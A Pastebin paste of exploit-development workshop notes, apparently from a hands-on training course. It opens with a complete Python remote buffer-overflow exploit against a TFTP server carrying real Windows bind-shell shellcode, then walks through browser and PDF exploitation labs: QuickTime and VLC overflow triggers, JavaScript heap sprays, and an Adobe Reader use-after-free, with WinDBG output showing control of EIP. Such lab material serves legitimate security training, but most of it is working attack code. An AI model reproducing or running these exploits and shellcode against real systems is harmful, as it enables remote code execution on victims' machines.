  824. #!/usr/bin/python2
  825. #TFTP Server remote Buffer Overflow
  826.  
  827. import sys
  828. import socket
  829. import struct
  830.  
  831. if len(sys.argv) < 2:
  832. sys.stderr.write("Usage: tftpd.py <host>\n")
  833. sys.exit(1)
  834.  
  835. target = sys.argv[1]
  836. port = 69
  837.  
  838. eip = 0x7e429353 # jmp esp in USER32.DLL
  839.  
  840. part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  841. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  842. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  843. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  844. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  845. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  846. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  847. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  848. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  849. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  850.  
  851. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  852. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  853. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  854. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  855. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  856. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  857. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  858. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  859. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  860. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  861. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  862.  
  863. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  864. prepend += "\x44" # inc esp
  865.  
  866. buf = "\x00\x01" # receive command
  867.  
  868. buf += "\x90" * (256 - len(part2)) # NOPs
  869. buf += part2 # shellcode part 2
  870. buf += struct.pack('<I', eip) # EIP (JMP ESP)
  871. buf += prepend # stack shifter
  872. buf += part1 # shellcode part 1
  873. buf += "\xE9" + struct.pack('<i', -380) # JMP -380
  874. buf += "\x00" # END
  875.  
  876. # print buf
  877.  
  878. # buf = "\x00\x01" # receive command
  879.  
  880. # buf += "A" * 300 + "\x00"
  881.  
  882. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  883.  
  884. try:
  885. sock.connect((target, port))
  886. sock.sendall(buf)
  887. except Exception as e:
  888. sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
  889. finally:
  890. sock.close()
  891. sys.stderr.write("Sent.\n")
  892.  
  893.  
  894.  
  895. -----------------------------------------------------------------------------------------------------------------
  896.  
  897.  
  898.  
  899.  
  900. How does all of this actually work
  901.  
  902.  
  903.  
  904.  
  905. Total shellcode length: 315
  906.  
  907. Part1: 150
  908. Part2: 165
  909.  
  910.  
  911. NOPS * (256 - 165)
  912.  
  913. 91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
  914. | | |
  915. 256 260 150 (410) |
  916. |<------------------------------------------------------------------------------------------------------------|
  917. Jump to the
  918. 30 byte mark
  919.  
  920.  
  921.  
  922. ############################
  923. # Lab 3: Browsers Exploits #
  924. ############################
  925.  
  926. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
  927. Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
  928. rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
  929.  
  930. <object id=quicktime clsid="999-999999-99-99999">
  931. <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
  932. </object>
  933.  
  934. var buf = "";
  935. for(i = 0; i < 50000; i++)
  936. buf += "A";
  937. var myobject = document.getElementById("quicktime");
  938. myobject.url = buf;
  939.  
  940. YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
  941.  
  942. - Browsers (Flash)
  943. - PDF
  944. - MS Office / OOo
  945.  
  946. VLC smb:// exploit
  947. ------------------
  948.  
  949. EXPLOIT VECTOR
  950.  
  951. smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
  952.  
  953. Exploit Scripts
  954. - ffvlc
  955.  
  956. ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
  957.  
  958. perl daemon.pl vlc0.html
  959.  
  960. ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
  961. Browse to http://your_host_ip_address:8080/
  962.  
  963. vlc0.html
  964. ---------
  965. <script>
  966. var buf = "";
  967. for(i = 0; i < 1250; i++)
  968. buf += unescape("%41%41%41%41");
  969. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  970. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  971. </script>
  972.  
  973. vlc1.html
  974. ---------
  975. <script>
  976.  
  977. // shellcode created in heap memory
  978. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  979.  
  980. // 800K block of NOPS
  981. var nop = unescape("%u9090%u09090"); // 4 NOPS
  982. while(nop.length < 0xc0000) {
  983. nop += nop;
  984. }
  985.  
  986. // spray the heap with NOP+shellcode
  987. var memory = new Array();
  988. for(i = 0; i < 50; i++) {
  989. memory[i] = nop + shellcode;
  990. }
  991.  
  992. // build the exploit payload
  993. var buf = "";
  994. for(i = 0; i < 1250; i++)
  995. buf += unescape("%41%41%41%41");
  996. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  997.  
  998. // trigger the exploit
  999. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  1000. </script>
  1001.  
  1002. perl daemon.pl vlc1.html
  1003.  
  1004. Search for where our NOPS+shellcode lies in the heap
  1005.  
  1006. s 0 l fffffff 90 90 90 90 cc cc cc cc
  1007.  
  1008. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
  1009. 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1010. 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1011. 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1012. 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1013. 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1014. 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1015. 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1016. 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1017. 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1018. 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1019. 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1020. 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1021. 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1022. 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1023. 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1024. 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1025.  
  1026. Edit vlc2.html
  1027. replace %41%41%41%41 with %07%07%07%07
  1028.  
  1029. (928.fd0): Break instruction exception - code 80000003 (first chance)
  1030. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
  1031. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
  1032. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1033. 07100000 cc int 3
  1034. 0:019> u
  1035. 07100000 cc int 3
  1036. 07100001 cc int 3
  1037. 07100002 cc int 3
  1038. 07100003 cc int 3
  1039. 07100004 cc int 3
  1040. 07100005 cc int 3
  1041. 07100006 cc int 3
  1042. 07100007 cc int 3
  1043.  
  1044. Create vlc3.html (Copy vlc2.html to vlc3.html)
  1045. ----------------------------------------------
  1046. Win32 Reverse Shell
  1047. - no restricted characters
  1048. - Encoder NONE
  1049. - use the Javascript encoded payload generated by msfweb
  1050.  
  1051.  
  1052.  
  1053.  
  1054. #######################
  1055. # Lab 4: PDF EXPLOITS #
  1056. #######################
  1057.  
  1058.  
  1059. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab4\adobe_mnp_skeleton
  1060. Acrobat Media newPlayer exploit
  1061. -------------------------------
  1062.  
  1063. Use-after-free bug
  1064.  
  1065. Exploit scripts are online at 172.16.0.100
  1066. - adobe_mnp
  1067.  
  1068. Download these scripts on your Strategicsec-XP-ED-Target-VM VM itself.
  1069.  
  1070.  
  1071. mnp0.pdf
  1072.  
  1073. - Open up acrobat reader
  1074. - WinDBG
  1075. - F6 attach to AcroRd32.exe
  1076. - g to Go
  1077.  
  1078. EIP = 41414141
  1079.  
  1080. Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
  1081.  
  1082. mnp1.pdf
  1083.  
  1084. All we are doing is changing EIP to 0c0c0c0c.
  1085. There is no heap spray in this one.
  1086.  
  1087. This exception may be expected and handled.
  1088. eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
  1089. eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
  1090. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  1091. 0c0c0c0c ?? ???
  1092.  
  1093. We know we get EIP control
  1094.  
  1095. mnp2.pdf
  1096.  
  1097. Put in the heap spray.
  1098.  
  1099. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  1100.  
  1101. var nops = unescape("%u9090%u9090");
  1102.  
  1103. while(nops.length <= 32768)
  1104. nops += nops;
  1105. nops = nops.substring(0,32768 - shellcode.length);
  1106.  
  1107. memory = new Array();
  1108.  
  1109. for(i = 0; i < 1500; i++) {
  1110. memory[i] = nops + shellcode;
  1111. }
  1112.  
  1113. 1500 NOP+shellcode blocks of 32K NOPs each
  1114.  
  1115. We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
  1116.  
  1117. We want to see what led to the crash.
  1118.  
  1119. EIP is invalid, so we can't disassemble around EIP
  1120.  
  1121. We need to trace the function that called us and crashed.
  1122. - STACK TRACE
  1123. - Dumps all the frames from the top of the stack.
  1124. - show you the series of calls that led up to the crash.
  1125. - we will analyze the topmost function on the frame.
  1126.  
  1127. WinDBG - stack trace - "k" command
  1128.  
  1129. 0:000> k
  1130. ChildEBP RetAddr
  1131. WARNING: Frame IP not in any known module. Following frames may be wrong.
  1132. 0013fb34 2d843117 0x90909090
  1133. 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
  1134. 0013fbdc 23825d8c EScript!PlugInMain+0x25584
  1135. 0013fc74 238257e2 EScript!PlugInMain+0x249dc
  1136. 0013fca4 238543c5 EScript!PlugInMain+0x24432
  1137. 0013fd04 00a78de1 EScript!PlugInMain+0x53015
  1138. 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
  1139. 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
  1140. 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
  1141. 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
  1142. 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
  1143. 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
  1144. 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
  1145. 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
  1146. 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
  1147. 0013ffc0 7c817067 AcroRd32+0x4004
  1148. 0013fff0 00000000 kernel32!BaseProcessStart+0x23
  1149.  
  1150. 2d843117 -- the return address that we would have returned to, if we didnt crash.
  1151. address 2d843117-2 we will have a CALL instruction.
  1152.  
  1153. u 2d843117
  1154. u 2d843117-2
  1155. u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
  1156. u 2d843117-4
  1157.  
  1158. 0:000> u 2d843117-3
  1159. Multimedia!PlugInMain+0x41b66:
  1160. 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
  1161. 2d843117 6a00 push 0
  1162. 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
  1163. 2d84311e 56 push esi
  1164. 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
  1165. 2d843124 83c40c add esp,0Ch
  1166. 2d843127 66b80100 mov ax,1
  1167. 2d84312b 5e pop esi
  1168.  
  1169. We control EDX
  1170. edx=0c0c0c0c
  1171.  
  1172. call [edx+4] = call [0c0c0c10]
  1173. dd edx+4
  1174.  
  1175. 0:000> dd edx+4
  1176. 0c0c0c10 90909090 90909090 90909090 90909090
  1177. 0c0c0c20 90909090 90909090 90909090 90909090
  1178.  
  1179. 0:000> u 2d843117-7
  1180. Multimedia!PlugInMain+0x41b62:
  1181. 2d843110 8b10 mov edx,dword ptr [eax]
  1182. 2d843112 8bc8 mov ecx,eax
  1183. 2d843114 ff5204 call dword ptr [edx+4]
  1184.  
  1185. dd eax
  1186.  
  1187. 0:000> dd eax
  1188. 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
  1189. 02e2d690 42424242 42424242 42424242 42424242
  1190. 02e2d6a0 42424242 42424242 42424242 42424242
  1191. 02e2d6b0 42424242 42424242 42424242 42424242
  1192. 02e2d6c0 42424242 42424242 00000000 00000000
  1193.  
  1194. mnp3.pdf
  1195.  
  1196. change the NOPs 90909090 to 0c0c0c0c
  1197.  
  1198. mov edx, [eax]
  1199. call [edx+4]
  1200.  
  1201. edx = 0c0c0c0c
  1202. edx+4 = 0c0c0c10
  1203. contents at edx+4 will also be "0c0c0c0c"
  1204.  
  1205. EIP will jump to 0c0c0c0c
  1206.  
  1207. and...
  1208.  
  1209. 0:000> u 0c0c0c0c
  1210. *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
  1211. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
  1212. 0c0c0c0c 0c0c or al,0Ch
  1213. 0c0c0c0e 0c0c or al,0Ch
  1214. 0c0c0c10 0c0c or al,0Ch
  1215. 0c0c0c12 0c0c or al,0Ch
  1216. 0c0c0c14 0c0c or al,0Ch
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!